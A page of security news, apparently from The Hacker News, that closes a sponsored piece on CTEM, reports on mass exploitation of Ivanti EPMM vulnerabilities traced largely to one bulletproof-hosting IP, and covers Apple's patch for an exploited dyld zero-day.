Each additional domain can add dozens of connected assets, and when the count climbs past 100, this can translate to thousands of additional scripts: each one a possible attack vector. Traditional snapshot security cannot hope to log and monitor them all. Only CTEM-driven programs can provide the oversight to continuously identify and validate the dark assets hiding in this visibility gap – before attackers do. Why This Matters Now Security leaders are currently facing a ‘perfect storm’ of demands.

At a time when 91% of CISOs report an increase in third-party incidents, average breach costs have climbed to $4.44M, and PCI DSS 4.0.1 brings stricter monitoring and the ever-present specter of penalties. With this in mind, the report shows that attack surface management has become an issue for the boardroom as much as the server room, and the C-suite reader can only conclude that continuing to trust manual oversight and periodic controls to manage such a complex, high-stakes challenge would be self-destructive. One of the clearest signals in this research comes from the peer benchmarking data. When organizations compare themselves side by side – by attack surface size, visibility, tooling, and outcomes – a pattern emerges that is difficult to ignore: beyond a certain level of complexity, traditional security approaches stop scaling.

The takeaway from the peer benchmarks is clear: below a certain level of exposure, organizations can rely on periodic controls and manual oversight. Above it, those models no longer hold. For security leaders operating in high-complexity environments, the question is no longer whether CTEM is valuable – it is whether their current approach can realistically keep up without it. Download the full market research here .

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

83% of Ivanti EPMM Exploits Linked to Single IP on Bulletproof Hosting Infrastructure

A significant chunk of the exploitation attempts targeting a newly disclosed security flaw in Ivanti Endpoint Manager Mobile (EPMM) can be traced back to a single IP address on bulletproof hosting infrastructure offered by PROSPERO. Threat intelligence firm GreyNoise said it recorded 417 exploitation sessions from 8 unique source IP addresses between February 1 and 9, 2026. An estimated 346 exploitation sessions have originated from 193.24.123[.]42, accounting for 83% of all attempts. The malicious activity is designed to exploit CVE-2026-1281 (CVSS scores: 9.8), one of the two critical security vulnerabilities in EPMM, along with CVE-2026-1340 that could be exploited by an attacker to achieve unauthenticated remote code execution.

Late last month, Ivanti acknowledged it’s aware of a “very limited number of customers” who were impacted following the zero-day exploitation of the issues. Since then, multiple European agencies, including the Netherlands’ Dutch Data Protection Authority (AP), Council for the Judiciary, the European Commission, and Finland’s Valtori, have disclosed that they were targeted by unknown threat actors using the vulnerabilities. Further analysis has revealed that the same host has been simultaneously exploiting three other CVEs across unrelated software - CVE-2026-21962 (Oracle WebLogic) - 2,902 sessions CVE-2026-24061 (GNU InetUtils telnetd) - 497 sessions CVE-2025-24799 (GLPI) - 200 sessions “The IP rotates through 300+ unique user agent strings spanning Chrome, Firefox, Safari, and multiple operating system variants,” GreyNoise said. “This fingerprint diversity, combined with concurrent exploitation of four unrelated software products, is consistent with automated tooling.” It’s worth noting that PROSPERO is assessed to be linked to another autonomous system called Proton66, which has a history of distributing desktop and Android malware like GootLoader, Matanbuchus, SpyNote, Coper (aka Octo), and SocGholish.

GreyNoise also pointed out that 85% of the exploitation sessions beaconed home via the domain name system (DNS) to confirm “this target is exploitable” without deploying any malware or exfiltrating data. The disclosure comes days after Defused Cyber reported a “sleeper shell” campaign that deployed a dormant in-memory Java class loader to compromised EPMM instances at the path “/mifs/403.jsp.” The cybersecurity company said the activity is indicative of initial access broker tradecraft, where threat actors establish a foothold to sell or hand off access later for financial gain. “That pattern is significant,” it noted. “OAST [out-of-band application security testing] callbacks indicate the campaign is cataloging which targets are vulnerable rather than deploying payloads immediately.

This is consistent with initial access operations that verify exploitability first and deploy follow-on tooling later.” Ivanti EPMM users are recommended to apply the patches, audit internet-facing Mobile Device Management (MDM) infrastructure, review DNS logs for OAST-pattern callbacks, and monitor for the /mifs/403.jsp path on EPMM instances, and block PROSPERO’s autonomous system (AS200593) at the network perimeter level. “EPMM compromise provides access to device management infrastructure for entire organizations, creating a lateral movement platform that bypasses traditional network segmentation,” GreyNoise said. “Organizations with internet-facing MDM, VPN concentrators, or other remote access infrastructure should operate under the assumption that critical vulnerabilities face exploitation within hours of disclosure.” Update Following the publication of the story, an Ivanti spokesperson shared the below statement with The Hacker News - Ivanti’s recommendation remains the same: customers who have not yet patched should do so immediately, and then review their appliance for any signs of exploitation that may have occurred prior to patching. Applying the patch is the most effective way to prevent exploitation, regardless of how IoCs change over time, especially once a POC is available.

The patch requires no downtime and takes only seconds to apply. Ivanti has provided customers with high-fidelity indicators of compromise, technical analysis at disclosure, and an Exploitation Detection script developed with NCSC-NL, and continues to support customers as we respond to this threat. The GreyNoise research team told The Hacker News via email that CVE-2026-1281 and CVE-2026-1340 were disclosed by Ivanti as related code injection vulnerabilities in different EPMM components, and that it’s tracking both the CVEs under a single deletion tag (CVE-2026-1281). “Given the relationship between the two, organizations should treat both CVEs as equally urgent,” it added.

(The story was updated after publication to include responses from Ivanti and GreyNoise.) Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Apple Fixes Exploited Zero-Day Affecting iOS, macOS, and Other Devices

Apple on Wednesday released iOS, iPadOS, macOS Tahoe, tvOS, watchOS, and visionOS updates to address a zero-day flaw that it said has been exploited in sophisticated cyber attacks. The vulnerability, tracked as CVE-2026-20700 (CVSS score: 7.8), has been described as a memory corruption issue in dyld, Apple’s Dynamic Link Editor. Successful exploitation of the vulnerability could allow an attacker with memory write capability to execute arbitrary code on susceptible devices. Google Threat Analysis Group (TAG) has been credited with discovering and reporting the bug.

“Apple is aware of a report that this issue may have been exploited in an extremely sophisticated attack against specific targeted individuals on versions of iOS before iOS 26,” the company said in an advisory. “CVE-2025-14174 and CVE-2025-43529 were also issued in response to this report.” It’s worth noting that both CVE-2025-14174 and CVE-2025-43529 were addressed by Cupertino in December 2025, with the former first disclosed by Google as having been exploited in the wild. CVE-2025-14174 (CVSS score: 8.8) relates to an out-of-bounds memory access in ANGLE’s Metal renderer component. Metal is a high-performance hardware-accelerated graphics and compute API developed by Apple.

CVE-2025-43529 (CVSS score: 8.8), on the other hand, is a use-after-free vulnerability in WebKit that may lead to arbitrary code execution when processing maliciously crafted web content. The updates are available for the following devices and operating systems - iOS 26.3 and iPadOS 26.3

• iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later macOS Tahoe 26.3
• Macs running macOS Tahoe tvOS 26.3
• Apple TV HD and Apple TV 4K (all models) watchOS 26.3
• Apple Watch Series 6 and later visionOS 26.3
• Apple Vision Pro (all models) In addition, Apple has also released updates to resolve various vulnerabilities in older versions of iOS, iPadOs, macOS, and Safari - iOS 18.7.5 and iPadOS 18.7.5
• iPhone XS, iPhone XS Max, iPhone XR, iPad 7th generation macOS Sequoia 15.7.4
• Macs running macOS Sequoia macOS Sonoma 14.8.4
• Macs running macOS Sonoma Safari 26.3
• Macs running macOS Sonoma and macOS Sequoia With the latest development, Apple has moved to address its first actively exploited zero-day in 2026. Last year, the company patched nine zero-day vulnerabilities that were exploited in the wild. Found this article interesting?

Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.